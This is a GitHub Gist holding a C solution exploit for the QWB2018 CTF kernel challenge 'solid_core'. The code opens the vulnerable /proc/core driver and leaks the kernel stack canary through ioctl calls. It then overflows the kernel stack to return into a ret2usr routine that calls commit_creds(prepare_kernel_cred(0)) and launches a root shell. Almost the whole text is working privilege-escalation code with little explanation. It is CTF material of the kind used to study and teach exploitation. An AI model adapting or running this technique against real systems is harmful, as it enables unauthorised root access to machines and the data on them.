Created
December 16, 2018 22:33
-
-
Save hama7230/de338959ada9935e9f2dd5f1492e4478 to your computer and use it in GitHub Desktop.
QWB2018 solid_core
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#include <stdlib.h> | |
#include <string.h> | |
#include <unistd.h> | |
#include <sys/stat.h> | |
#include <fcntl.h> | |
#include <sys/types.h> | |
#include <sys/ioctl.h> | |
struct cred; | |
struct task_struct; | |
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3))); | |
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3))); | |
prepare_kernel_cred_t prepare_kernel_cred; | |
commit_creds_t commit_creds; | |
int fd; | |
long user_stack; | |
unsigned long user_cs; | |
unsigned long user_ss; | |
unsigned long user_rflags; | |
static void save_state() { | |
__asm__("mov %0, cs\n" | |
"mov %1, ss\n" | |
"pushfq\n" | |
"popq %2\n" | |
:"=r"(user_cs),"=r"(user_ss),"=r"(user_rflags) | |
: | |
:"memory" | |
); | |
} | |
void launch_shell(void) { | |
system("/bin/sh"); | |
} | |
void get_root(void) { | |
commit_creds(prepare_kernel_cred(0)); | |
__asm__("swapgs\n" | |
"mov rax, %0\n" | |
"push rax\n" | |
"mov rax, %1\n" | |
"push rax\n" | |
"mov rax, %2\n" | |
"push rax\n" | |
"mov rax, %3\n" | |
"push rax\n" | |
"mov rax, %4\n" | |
"push rax\n" | |
"iretq\n" | |
: | |
:"r"(user_ss),"r"(user_stack),"r"(user_rflags),"r"(user_cs),"r"(launch_shell) | |
:"memory" | |
); | |
} | |
// from https://www.exploit-db.com/exploits/44303 | |
unsigned long get_kernel_sym(char *name) | |
{ | |
FILE *f; | |
unsigned long addr; | |
char dummy; | |
char sname[256]; | |
int ret = 0; | |
f = fopen("/tmp/kallsyms", "r"); | |
if (f == NULL) { | |
printf("[-] Failed to open /tmp/kallsyms\n"); | |
exit(-1); | |
} | |
printf("[+] Find %s...\n", name); | |
while(ret != EOF) { | |
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); | |
if (ret == 0) { | |
fscanf(f, "%s\n", sname); | |
continue; | |
} | |
if (!strcmp(name, sname)) { | |
fclose(f); | |
printf("[+] Found %s at %lx\n", name, addr); | |
return addr; | |
} | |
} | |
fclose(f); | |
return 0; | |
} | |
void core_copy(long size) { | |
ioctl(fd, 0x6677889A, size); | |
} | |
void core_read(char* buf) { | |
ioctl(fd, 0x6677889B, buf); | |
} | |
void set_off(unsigned long off) { | |
ioctl(fd, 0x6677889C, off); | |
} | |
int main(void) { | |
unsigned long buf[0x800/8]; | |
user_stack = buf; | |
save_state(); | |
prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred"); | |
commit_creds = (commit_creds_t)get_kernel_sym("commit_creds"); | |
puts("open /proc/core"); | |
fd = open("/proc/core", O_RDWR); | |
if (fd < 0) | |
exit(1); | |
puts("leak kernel canary"); | |
memset(buf, 0, 0x800); | |
set_off(0x40); | |
core_read(buf); | |
unsigned long canary = buf[0]; | |
printf("canary = %lx\n", canary); | |
puts("cause stack bof"); | |
buf[0x40/8] = canary; | |
buf[0x48/8] = user_stack; | |
buf[0x50/8] = get_root; | |
write(fd, buf, 0x200); | |
core_copy(0xffffffffffff0080); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment